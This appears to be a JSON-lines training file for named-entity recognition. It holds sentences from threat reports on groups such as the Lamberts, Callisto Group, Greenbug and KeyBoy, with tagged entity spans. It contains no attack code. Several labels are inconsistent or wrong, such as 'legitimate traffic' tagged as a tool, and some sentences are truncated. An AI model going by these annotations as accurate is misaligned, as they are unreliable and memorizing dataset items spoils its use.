{"text": "In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software .", "spans": {"TOOL: Lurk module": [[55, 66]]}, "info": {"id": "dnrti_train_002106", "source": "dnrti_train"}}
{"text": "Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software .", "spans": {}, "info": {"id": "dnrti_train_002107", "source": "dnrti_train"}}
{"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc .", "spans": {}, "info": {"id": "dnrti_train_002108", "source": "dnrti_train"}}
{"text": "As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users .", "spans": {"TOOL: Lurk": [[81, 85]]}, "info": {"id": "dnrti_train_002109", "source": "dnrti_train"}}
{"text": "In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions .", "spans": {"ORGANIZATION: Kaspersky Lab": [[19, 32]], "ORGANIZATION: GReAT": [[72, 77]], "ORGANIZATION: financial institutions": [[139, 161]]}, "info": {"id": "dnrti_train_002110", "source": "dnrti_train"}}
{"text": "Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk .", "spans": {"TOOL: Trojan": [[178, 184]], "TOOL: Lurk": [[192, 196]]}, "info": {"id": "dnrti_train_002111", "source": "dnrti_train"}}
{"text": "which they launched targeted attacks against Russian banks , businesses and media companies .", "spans": {"ORGANIZATION: media companies": [[76, 91]]}, "info": {"id": "dnrti_train_002112", "source": "dnrti_train"}}
{"text": "Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file .", "spans": {"TOOL: Lurk": [[0, 4]]}, "info": {"id": "dnrti_train_002113", "source": "dnrti_train"}}
{"text": "The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" .", "spans": {}, "info": {"id": "dnrti_train_002114", "source": "dnrti_train"}}
{"text": "Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia .", "spans": {"ORGANIZATION: critical infrastructure engineering firms": [[158, 199]], "ORGANIZATION: government agencies": [[202, 221]]}, "info": {"id": "dnrti_train_002115", "source": "dnrti_train"}}
{"text": "A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 .", "spans": {}, "info": {"id": "dnrti_train_002116", "source": "dnrti_train"}}
{"text": "it reports to was created on August 10 , 2011 .", "spans": {}, "info": {"id": "dnrti_train_002117", "source": "dnrti_train"}}
{"text": "Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims .", "spans": {"TOOL: Lamberts": [[26, 34]]}, "info": {"id": "dnrti_train_002118", "source": "dnrti_train"}}
{"text": "Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: The Lamberts": [[45, 57]], "ORGANIZATION: ITSec community": [[97, 112]], "ORGANIZATION: FireEye": [[148, 155]], "VULNERABILITY: zero day vulnerability": [[185, 207]], "VULNERABILITY: CVE-2014-4148": [[210, 223]]}, "info": {"id": "dnrti_train_002119", "source": "dnrti_train"}}
{"text": "The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe .", "spans": {"TOOL: BlackLambert": [[41, 53]], "ORGANIZATION: high profile organization": [[85, 110]]}, "info": {"id": "dnrti_train_002120", "source": "dnrti_train"}}
{"text": "Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers .", "spans": {"TOOL: network-driven backdoors": [[23, 47]], "TOOL: modular backdoors": [[73, 90]], "TOOL: harvesting tools": [[93, 109]], "TOOL: wipers": [[116, 122]]}, "info": {"id": "dnrti_train_002121", "source": "dnrti_train"}}
{"text": "The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": {"TOOL: Lambert family malware": [[19, 41]], "ORGANIZATION: FireEye": [[92, 99]], "VULNERABILITY: zero day exploit": [[122, 138]], "VULNERABILITY: CVE-2014-4148": [[141, 154]]}, "info": {"id": "dnrti_train_002122", "source": "dnrti_train"}}
{"text": "Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions .", "spans": {"TOOL: Blue Lambert": [[27, 39]], "TOOL: Green Lambert": [[92, 105]]}, "info": {"id": "dnrti_train_002123", "source": "dnrti_train"}}
{"text": "While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related .", "spans": {"TOOL: White Lambert": [[54, 67]], "TOOL: Blue Lambert": [[99, 111]]}, "info": {"id": "dnrti_train_002124", "source": "dnrti_train"}}
{"text": "Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families .", "spans": {"TOOL: White Lambert samples": [[85, 106]], "TOOL: White": [[153, 158]], "TOOL: Pink Lambert malware families": [[163, 192]]}, "info": {"id": "dnrti_train_002125", "source": "dnrti_train"}}
{"text": "While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": {"VULNERABILITY: zero-day exploit": [[125, 141]], "VULNERABILITY: CVE-2014-4148": [[144, 157]]}, "info": {"id": "dnrti_train_002126", "source": "dnrti_train"}}
{"text": "This migration activity was last observed in October 2016 .", "spans": {}, "info": {"id": "dnrti_train_002127", "source": "dnrti_train"}}
{"text": "Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address .", "spans": {"TOOL: Blue and Green Lambert samples": [[12, 42]]}, "info": {"id": "dnrti_train_002128", "source": "dnrti_train"}}
{"text": "Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice .", "spans": {"TOOL: Gray Lambert": [[32, 44]], "TOOL: mwapi32.dll": [[49, 60]], "TOOL: poolstr.dll": [[65, 76]], "TOOL: Lamberts": [[138, 146]]}, "info": {"id": "dnrti_train_002129", "source": "dnrti_train"}}
{"text": "Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 .", "spans": {"TOOL: Black Lambert": [[0, 13]], "ORGANIZATION: FireEye": [[112, 119]]}, "info": {"id": "dnrti_train_002130", "source": "dnrti_train"}}
{"text": "The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 .", "spans": {"TOOL: Lamberts toolkit": [[4, 20]]}, "info": {"id": "dnrti_train_002131", "source": "dnrti_train"}}
{"text": "To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": {"TOOL: Lamberts toolkit": [[69, 85]], "TOOL: Black Lambert": [[102, 115]], "VULNERABILITY: zero day exploit": [[152, 168]], "VULNERABILITY: CVE-2014-4148": [[171, 184]]}, "info": {"id": "dnrti_train_002132", "source": "dnrti_train"}}
{"text": "Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed .", "spans": {"TOOL: Lamberts": [[43, 51]], "TOOL: Regin": [[87, 92]], "TOOL: ProjectSauron": [[95, 108]], "TOOL: Equation": [[111, 119]], "TOOL: Duqu2": [[124, 129]]}, "info": {"id": "dnrti_train_002133", "source": "dnrti_train"}}
{"text": "On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times .", "spans": {"ORGANIZATION: fake ad agencies": [[112, 128]]}, "info": {"id": "dnrti_train_002135", "source": "dnrti_train"}}
{"text": "Cadelle , uses Backdoor.Cadelspy .", "spans": {"TOOL: Backdoor.Cadelspy": [[15, 32]]}, "info": {"id": "dnrti_train_002136", "source": "dnrti_train"}}
{"text": "Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "dnrti_train_002137", "source": "dnrti_train"}}
{"text": "Chafer , uses Backdoor.Remexi .", "spans": {"TOOL: Backdoor.Remexi": [[14, 29]]}, "info": {"id": "dnrti_train_002138", "source": "dnrti_train"}}
{"text": "Cadelle 's threats are capable of opening a back door and stealing information from victims' computers .", "spans": {}, "info": {"id": "dnrti_train_002139", "source": "dnrti_train"}}
{"text": "Chafer , uses Backdoor.Remexi.B .", "spans": {"TOOL: Backdoor.Remexi.B": [[14, 31]]}, "info": {"id": "dnrti_train_002140", "source": "dnrti_train"}}
{"text": "registrant information points to activity possibly as early as 2011 .", "spans": {}, "info": {"id": "dnrti_train_002141", "source": "dnrti_train"}}
{"text": "These threats are capable of opening a back door and stealing information from victims' computers .", "spans": {}, "info": {"id": "dnrti_train_002142", "source": "dnrti_train"}}
{"text": "executable compilation times suggest early 2012 .", "spans": {}, "info": {"id": "dnrti_train_002143", "source": "dnrti_train"}}
{"text": "It's unclear how Cadelle infects its targets with Backdoor.Cadelspy .", "spans": {"TOOL: Backdoor.Cadelspy": [[50, 67]]}, "info": {"id": "dnrti_train_002144", "source": "dnrti_train"}}
{"text": "The affected organizations we were able to identify are mostly based in the Middle East .", "spans": {}, "info": {"id": "dnrti_train_002145", "source": "dnrti_train"}}
{"text": "one organization is located in the US .", "spans": {}, "info": {"id": "dnrti_train_002146", "source": "dnrti_train"}}
{"text": "There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran .", "spans": {}, "info": {"id": "dnrti_train_002147", "source": "dnrti_train"}}
{"text": "Their primary interest appears to be gathering intelligence .", "spans": {}, "info": {"id": "dnrti_train_002149", "source": "dnrti_train"}}
{"text": "This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant .", "spans": {"TOOL: Green Lambert": [[109, 122]], "TOOL: Blue": [[157, 161]]}, "info": {"id": "dnrti_train_002150", "source": "dnrti_train"}}
{"text": "security policy in the Eastern Europe and South Caucasus regions .", "spans": {}, "info": {"id": "dnrti_train_002151", "source": "dnrti_train"}}
{"text": "Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {}, "info": {"id": "dnrti_train_002152", "source": "dnrti_train"}}
{"text": "In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": {"MALWARE: malicious attachments": [[90, 111]], "TOOL: Scout": [[160, 165]]}, "info": {"id": "dnrti_train_002153", "source": "dnrti_train"}}
{"text": "These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {}, "info": {"id": "dnrti_train_002154", "source": "dnrti_train"}}
{"text": "Callisto Group appears to be intelligence gathering related to European foreign and security policy .", "spans": {}, "info": {"id": "dnrti_train_002155", "source": "dnrti_train"}}
{"text": "some indications of loosely linked activity dating back to at least 2013 .", "spans": {}, "info": {"id": "dnrti_train_002156", "source": "dnrti_train"}}
{"text": "In October 2015 , the Callisto Group was observed sending targeted credential phishing emails .", "spans": {"THREAT_ACTOR: Callisto Group": [[22, 36]]}, "info": {"id": "dnrti_train_002157", "source": "dnrti_train"}}
{"text": "In early 2016 , the Callisto Group was observed sending targeted spear phishing emails .", "spans": {}, "info": {"id": "dnrti_train_002158", "source": "dnrti_train"}}
{"text": "The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": {"MALWARE: malicious attachments": [[4, 25]], "TOOL: invitations": [[42, 53]], "TOOL: drafts of the agenda": [[57, 77]]}, "info": {"id": "dnrti_train_002159", "source": "dnrti_train"}}
{"text": "Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform .", "spans": {"THREAT_ACTOR: Callisto Group": [[25, 39]], "TOOL: installers": [[186, 196]]}, "info": {"id": "dnrti_train_002160", "source": "dnrti_train"}}
{"text": "In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"THREAT_ACTOR: Callisto Group": [[43, 57]], "TOOL: Scout": [[80, 85]], "THREAT_ACTOR: Galileo": [[114, 121]]}, "info": {"id": "dnrti_train_002161", "source": "dnrti_train"}}
{"text": "We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets .", "spans": {}, "info": {"id": "dnrti_train_002162", "source": "dnrti_train"}}
{"text": "If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"TOOL: Scout": [[237, 242]]}, "info": {"id": "dnrti_train_002163", "source": "dnrti_train"}}
{"text": "Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China .", "spans": {}, "info": {"id": "dnrti_train_002164", "source": "dnrti_train"}}
{"text": "they have been last known to employ malware in February 2016 .", "spans": {}, "info": {"id": "dnrti_train_002165", "source": "dnrti_train"}}
{"text": "RCS Galileo platform .", "spans": {}, "info": {"id": "dnrti_train_002166", "source": "dnrti_train"}}
{"text": "The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment .", "spans": {"THREAT_ACTOR: Callisto Group": [[59, 73]]}, "info": {"id": "dnrti_train_002167", "source": "dnrti_train"}}
{"text": "In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target 's webmail credentials .", "spans": {}, "info": {"id": "dnrti_train_002168", "source": "dnrti_train"}}
{"text": "The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week .", "spans": {}, "info": {"id": "dnrti_train_002169", "source": "dnrti_train"}}
{"text": "Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks .", "spans": {}, "info": {"id": "dnrti_train_002170", "source": "dnrti_train"}}
{"text": "On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf .", "spans": {"ORGANIZATION: Arbor Networks": [[13, 27]], "TOOL: Trojan": [[94, 100]], "TOOL: RAT": [[103, 106]], "TOOL: Ismdoor": [[116, 123]]}, "info": {"id": "dnrti_train_002171", "source": "dnrti_train"}}
{"text": "\" With our latest research we now see how Greenbug has shifted away from HTTP-based C2 communication with Ismdoor .", "spans": {"TOOL: Ismdoor": [[106, 113]]}, "info": {"id": "dnrti_train_002172", "source": "dnrti_train"}}
{"text": "It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"TOOL: DNS-based attack technique": [[26, 52]], "ORGANIZATION: Arbor 's ASERT Team": [[183, 202]]}, "info": {"id": "dnrti_train_002173", "source": "dnrti_train"}}
{"text": "t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"TOOL: DNS-based attack technique": [[25, 51]], "ORGANIZATION: Arbor 's ASERT Team": [[182, 201]]}, "info": {"id": "dnrti_train_002174", "source": "dnrti_train"}}
{"text": "By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection .", "spans": {}, "info": {"id": "dnrti_train_002175", "source": "dnrti_train"}}
{"text": "In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials .", "spans": {"TOOL: Ismdoor RAT": [[22, 33]]}, "info": {"id": "dnrti_train_002176", "source": "dnrti_train"}}
{"text": "To do this , it employs a number of specific commands via DNSMessenger .", "spans": {"TOOL: DNSMessenger": [[58, 70]]}, "info": {"id": "dnrti_train_002177", "source": "dnrti_train"}}
{"text": "Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies .", "spans": {"ORGANIZATION: High-Tech": [[87, 96]], "ORGANIZATION: Cyber Security Companies": [[101, 125]]}, "info": {"id": "dnrti_train_002178", "source": "dnrti_train"}}
{"text": "By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent .", "spans": {}, "info": {"id": "dnrti_train_002179", "source": "dnrti_train"}}
{"text": "Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim .", "spans": {"TOOL: Trochilus": [[6, 15]], "TOOL: RAT": [[27, 30]]}, "info": {"id": "dnrti_train_002180", "source": "dnrti_train"}}
{"text": "According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website .", "spans": {"ORGANIZATION: Myanmar Union Election Commission": [[271, 304]], "ORGANIZATION: UEC": [[307, 310]]}, "info": {"id": "dnrti_train_002181", "source": "dnrti_train"}}
{"text": "Trochilus RAT activity was discovered during both months of October and November 2015 .", "spans": {}, "info": {"id": "dnrti_train_002182", "source": "dnrti_train"}}
{"text": "From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization .", "spans": {"TOOL: Trochilus RAT": [[84, 97]], "TOOL: RAT": [[119, 122]], "TOOL: MoonWind": [[135, 143]], "ORGANIZATION: utility organization": [[194, 214]]}, "info": {"id": "dnrti_train_002183", "source": "dnrti_train"}}
{"text": "We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples .", "spans": {"TOOL: MoonWind": [[20, 28]]}, "info": {"id": "dnrti_train_002184", "source": "dnrti_train"}}
{"text": "The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past .", "spans": {"TOOL: legitimate Thai websites": [[30, 54]]}, "info": {"id": "dnrti_train_002185", "source": "dnrti_train"}}
{"text": "Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time .", "spans": {"TOOL: Trochilus": [[9, 18]], "TOOL: MoonWind RATs": [[23, 36]]}, "info": {"id": "dnrti_train_002186", "source": "dnrti_train"}}
{"text": "The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone .", "spans": {"TOOL: command and control servers": [[29, 56]]}, "info": {"id": "dnrti_train_002187", "source": "dnrti_train"}}
{"text": "Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website .", "spans": {"TOOL: MoonWind samples": [[38, 54]], "TOOL: legitimate website": [[139, 157]]}, "info": {"id": "dnrti_train_002188", "source": "dnrti_train"}}
{"text": "The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables .", "spans": {"TOOL: MoonWind samples": [[105, 121]], "TOOL: RAR files": [[125, 134]], "TOOL: RATs": [[171, 175]]}, "info": {"id": "dnrti_train_002189", "source": "dnrti_train"}}
{"text": "We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University .", "spans": {}, "info": {"id": "dnrti_train_002190", "source": "dnrti_train"}}
{"text": "Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity .", "spans": {"TOOL: Trochilus": [[0, 9]], "ORGANIZATION: Arbor Networks": [[32, 46]]}, "info": {"id": "dnrti_train_002191", "source": "dnrti_train"}}
{"text": "The activity dates to at least 2013 and has ties to multiple reports by other researchers .", "spans": {}, "info": {"id": "dnrti_train_002192", "source": "dnrti_train"}}
{"text": "It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook .", "spans": {"TOOL: MoonWind": [[20, 28]]}, "info": {"id": "dnrti_train_002193", "source": "dnrti_train"}}
{"text": "The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": {}, "info": {"id": "dnrti_train_002194", "source": "dnrti_train"}}
{"text": "On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India .", "spans": {"ORGANIZATION: Rapid7": [[19, 25]], "TOOL: KeyBoy": [[67, 73]], "TOOL: MS12-060": [[161, 169]]}, "info": {"id": "dnrti_train_002195", "source": "dnrti_train"}}
{"text": "As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure .", "spans": {}, "info": {"id": "dnrti_train_002196", "source": "dnrti_train"}}
{"text": "Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar .", "spans": {"TOOL: legitimate traffic": [[17, 35]]}, "info": {"id": "dnrti_train_002197", "source": "dnrti_train"}}
{"text": "Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 .", "spans": {}, "info": {"id": "dnrti_train_002198", "source": "dnrti_train"}}
{"text": "Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain .", "spans": {"ORGANIZATION: TRAC": [[67, 71]]}, "info": {"id": "dnrti_train_002199", "source": "dnrti_train"}}
{"text": "In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples .", "spans": {"TOOL: backdoor": [[158, 166]], "TOOL: KeyBoy": [[265, 271]]}, "info": {"id": "dnrti_train_002200", "source": "dnrti_train"}}
{"text": "We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": {"MALWARE: THAM luan - GD -": [[51, 67]], "MALWARE: NCKH2.doc": [[68, 77]], "TOOL: MS12-060": [[162, 170]]}, "info": {"id": "dnrti_train_002201", "source": "dnrti_train"}}
{"text": "For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same way .", "spans": {"TOOL: Vietnamese backdoor": [[45, 64]]}, "info": {"id": "dnrti_train_002203", "source": "dnrti_train"}}
{"text": "In the second set they are making use of a dynamic DNS service by ChangeIP.com .", "spans": {"TOOL: dynamic DNS service": [[43, 62]]}, "info": {"id": "dnrti_train_002204", "source": "dnrti_train"}}
{"text": "The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"ORGANIZATION: Tibetan community": [[4, 21]], "TOOL: malware": [[91, 98]]}, "info": {"id": "dnrti_train_002205", "source": "dnrti_train"}}
{"text": "he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"ORGANIZATION: Tibetan community": [[3, 20]], "TOOL: malware": [[90, 97]]}, "info": {"id": "dnrti_train_002206", "source": "dnrti_train"}}
{"text": "They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": {"ORGANIZATION: ethnic minorities": [[50, 67]], "ORGANIZATION: religious groups": [[72, 88]]}, "info": {"id": "dnrti_train_002207", "source": "dnrti_train"}}
{"text": "Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"MALWARE: document malware": [[26, 42]], "ORGANIZATION: Tibetan non-governmental organizations": [[62, 100]], "ORGANIZATION: Falun Gong": [[129, 139]], "ORGANIZATION: Uyghur groups": [[144, 157]]}, "info": {"id": "dnrti_train_002208", "source": "dnrti_train"}}
{"text": "More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power .", "spans": {"ORGANIZATION: Arbor Networks": [[24, 38]]}, "info": {"id": "dnrti_train_002209", "source": "dnrti_train"}}
{"text": "For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": {"ORGANIZATION: Tibetan community": [[110, 127]]}, "info": {"id": "dnrti_train_002211", "source": "dnrti_train"}}
{"text": "These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy .", "spans": {"TOOL: email lures": [[42, 53]], "TOOL: KeyBoy": [[131, 137]]}, "info": {"id": "dnrti_train_002212", "source": "dnrti_train"}}
{"text": "In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) .", "spans": {"ORGANIZATION: Tibetan Parliament": [[84, 102]], "ORGANIZATION: Tibetan": [[142, 149]], "ORGANIZATION: Central Tibetan Administration": [[190, 220]]}, "info": {"id": "dnrti_train_002213", "source": "dnrti_train"}}
{"text": "The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests .", "spans": {"ORGANIZATION: Arbor": [[4, 9]], "ORGANIZATION: Tibetan groups": [[125, 139]]}, "info": {"id": "dnrti_train_002214", "source": "dnrti_train"}}
{"text": "The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 .", "spans": {"TOOL: KeyBoy backdoor": [[85, 100]], "ORGANIZATION: Rapid7": [[128, 134]]}, "info": {"id": "dnrti_train_002215", "source": "dnrti_train"}}
{"text": "This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco .", "spans": {"TOOL: KeyBoy": [[64, 70]], "ORGANIZATION: Cisco": [[94, 99]]}, "info": {"id": "dnrti_train_002216", "source": "dnrti_train"}}
{"text": "These versions of KeyBoy differed from the one first described by Rapid7 in several ways , many of which will be described in the sections to follow .", "spans": {"TOOL: KeyBoy": [[18, 24]], "ORGANIZATION: Rapid7": [[66, 72]]}, "info": {"id": "dnrti_train_002217", "source": "dnrti_train"}}
{"text": "These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus .", "spans": {}, "info": {"id": "dnrti_train_002218", "source": "dnrti_train"}}
{"text": "We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures .", "spans": {"TOOL: KeyBoy samples": [[38, 52]]}, "info": {"id": "dnrti_train_002219", "source": "dnrti_train"}}
{"text": "In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware .", "spans": {"TOOL: KeyBoy": [[144, 150]], "TOOL: string obfuscation routine": [[165, 191]]}, "info": {"id": "dnrti_train_002220", "source": "dnrti_train"}}
{"text": "Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "TOOL: KeyBoy": [[57, 63]]}, "info": {"id": "dnrti_train_002221", "source": "dnrti_train"}}
{"text": "This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": {"VULNERABILITY: CVE-2012-0158": [[52, 65]]}, "info": {"id": "dnrti_train_002222", "source": "dnrti_train"}}
{"text": "The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": {"ORGANIZATION: Tibetan Parliamentarians": [[26, 50]], "MALWARE: malicious attachments": [[84, 105]], "TOOL: documents bearing exploits": [[121, 147]]}, "info": {"id": "dnrti_train_002223", "source": "dnrti_train"}}
{"text": "Chances are about even , though , that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved .", "spans": {"THREAT_ACTOR: Mofang": [[39, 45]]}, "info": {"id": "dnrti_train_002224", "source": "dnrti_train"}}
{"text": "In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries .", "spans": {"THREAT_ACTOR: Mofang": [[41, 47]]}, "info": {"id": "dnrti_train_002225", "source": "dnrti_train"}}
{"text": "This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang .", "spans": {"ORGANIZATION: Fox-IT": [[67, 73]], "THREAT_ACTOR: Mofang": [[124, 130]]}, "info": {"id": "dnrti_train_002226", "source": "dnrti_train"}}
{"text": "The name Mofang is based on the Mandarin verb , which means to imitate .", "spans": {"THREAT_ACTOR: Mofang": [[9, 15]]}, "info": {"id": "dnrti_train_002227", "source": "dnrti_train"}}
{"text": "It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated .", "spans": {"THREAT_ACTOR: Mofang group": [[29, 41]]}, "info": {"id": "dnrti_train_002228", "source": "dnrti_train"}}
{"text": "Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter .", "spans": {"TOOL: ShimRat": [[62, 69]], "TOOL: SimRatReporter": [[74, 88]]}, "info": {"id": "dnrti_train_002229", "source": "dnrti_train"}}
{"text": "The Mofang group has been active in relation to the Kyaukphyu sez .", "spans": {"THREAT_ACTOR: Mofang group": [[4, 16]]}, "info": {"id": "dnrti_train_002230", "source": "dnrti_train"}}
